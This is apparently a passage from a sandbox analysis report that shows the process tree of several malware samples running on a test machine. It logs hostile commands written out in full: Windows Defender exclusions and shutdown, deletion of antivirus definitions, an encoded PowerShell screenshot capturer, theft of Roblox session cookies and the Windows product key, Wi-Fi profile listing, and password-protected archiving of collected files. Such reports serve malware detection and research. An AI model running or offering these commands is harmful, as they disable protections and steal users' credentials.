      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC942.tmp.bat""
      4⤵
      PID:7596
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2992
    - - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        5⤵
        
        PID:5504
- - C:\Users\Admin\AppData\Local\Temp\a\File.exe
    "C:\Users\Admin\AppData\Local\Temp\a\File.exe"
    3⤵
    PID:7356
- - C:\Users\Admin\AppData\Local\Temp\a\nvc.exe
    "C:\Users\Admin\AppData\Local\Temp\a\nvc.exe"
    3⤵
    PID:2056
- - C:\Users\Admin\AppData\Local\Temp\a\zx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\zx.exe"
    3⤵
    PID:3564
  - - C:\Users\Admin\AppData\Local\Temp\a\zx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\zx.exe"
      4⤵
      PID:7668
- - C:\Users\Admin\AppData\Local\Temp\a\ScreenSync.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ScreenSync.exe"
    3⤵
    PID:7480
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 1532
      4⤵
      Program crash
      PID:2060
- - C:\Users\Admin\AppData\Local\Temp\a\InstallSetup.exe
    "C:\Users\Admin\AppData\Local\Temp\a\InstallSetup.exe"
    3⤵
    PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\E601.tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\E601.tmp.exe"
      4⤵
      PID:6220
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6220 -s 1496
        5⤵
        Program crash
        
        PID:7484
- - C:\Users\Admin\AppData\Local\Temp\a\Lead_dumper.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Lead_dumper.exe"
    3⤵
    PID:6292
- - C:\Users\Admin\AppData\Local\Temp\a\msword.exe
    "C:\Users\Admin\AppData\Local\Temp\a\msword.exe"
    3⤵
    PID:4916
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Hospital Hospital.cmd & Hospital.cmd
      4⤵
      PID:7828
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:8064
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        
        PID:420
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:7308
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        5⤵
        
        PID:6688
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 82121
        5⤵
        
        PID:6068
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Sd
        5⤵
        
        PID:7360
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "EXPECTED" Pays
        5⤵
        
        PID:4640
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 82121\Qui.com + Notre + Sheer + Danny + Testament + Prompt + Knee + Sucks + Hindu + Emperor + Pay + Higher + Runtime 82121\Qui.com
        5⤵
        
        PID:6288
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Revision + ..\Ii + ..\Participants V
        5⤵
        
        PID:7688
    - - C:\Users\Admin\AppData\Local\Temp\82121\Qui.com
        
        Qui.com V
        5⤵
        
        PID:7020
      - C:\Users\Admin\AppData\Local\Temp\82121\RegAsm.exe
        
        C:\Users\Admin\AppData\Local\Temp\82121\RegAsm.exe
        6⤵
        
        PID:6940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\82121\RegAsm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RegAsm.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1868
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:5508
- - C:\Users\Admin\AppData\Local\Temp\a\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Built.exe"
    3⤵
    PID:5768
  - - C:\Users\Admin\AppData\Local\Temp\a\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Built.exe"
      4⤵
      PID:440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Built.exe'"
        5⤵
        
        PID:3708
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Built.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5372
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        
        PID:7872
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2488
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5968
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:5296
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:8040
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:8160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:7696
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:2276
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:5188
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        
        PID:5604
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5316
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        
        PID:3552
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:2736
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5828
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4920
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        
        PID:556
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:5208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        
        PID:2780
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        6⤵
        
        PID:3728
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yd0xkewz\yd0xkewz.cmdline"
        7⤵
        
        PID:5272
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES36A3.tmp" "c:\Users\Admin\AppData\Local\Temp\yd0xkewz\CSCC33AF97089284E23AB3260175AAACD7C.TMP"
        8⤵
        
        PID:7788
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:3428
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6176
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7736
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:5512
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7700
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:3040
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:7984
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        
        PID:6928
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4696
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        5⤵
        
        PID:8948
      - C:\Windows\system32\getmac.exe
        
        getmac
        6⤵
        
        PID:7244
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:8660
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6248
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        5⤵
        
        PID:8920
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        
        PID:8476
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\1xpUg.zip" *"
        5⤵
        
        PID:3264
      - C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI57682\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\1xpUg.zip" *
        6⤵
        
        PID:4852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        5⤵
        
        PID:1568
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        6⤵
        
        PID:2836
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        5⤵
        
        PID:9056
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        6⤵
        
        PID:1340
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:7188
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:8236
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        5⤵
        
        PID:8396
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5736
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:8104
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:5668
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        5⤵
        
        PID:6452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        6⤵
        
        PID:7544
- - C:\Users\Admin\AppData\Local\Temp\a\4422_8390.exe
    "C:\Users\Admin\AppData\Local\Temp\a\4422_8390.exe"
    3⤵
    PID:2212
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      PID:6332
- - C:\Users\Admin\AppData\Local\Temp\a\4181_461.exe
    "C:\Users\Admin\AppData\Local\Temp\a\4181_461.exe"
    3⤵
    PID:1608
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      4⤵
      PID:2344
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1608 -s 528
      4⤵
      Program crash
      PID:6320
- - C:\Users\Admin\AppData\Local\Temp\a\EmmetPROD.exe
    "C:\Users\Admin\AppData\Local\Temp\a\EmmetPROD.exe"
    3⤵
    PID:632
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c wmic computersystem get name, TotalPhysicalMemory /Value && wmic os get caption /Value && wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /Value && ipconfig | find "IPv4" | find /N ":" | find "[1]"
      4⤵
      PID:4232
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem get name, TotalPhysicalMemory /Value
        5⤵
        
        PID:3440
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic os get caption /Value
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /Value
        5⤵
        
        PID:2816
    - - C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig
        5⤵
        Gathers network information
        
        PID:2824
    - - C:\Windows\SysWOW64\find.exe
        
        find "IPv4"
        5⤵
        
        PID:6400
    - - C:\Windows\SysWOW64\find.exe
        
        find /N ":"
        5⤵
        
        PID:2992
    - - C:\Windows\SysWOW64\find.exe
        
        find "[1]"
        5⤵
        
        PID:4776
- - C:\Users\Admin\AppData\Local\Temp\a\1374_2790.exe
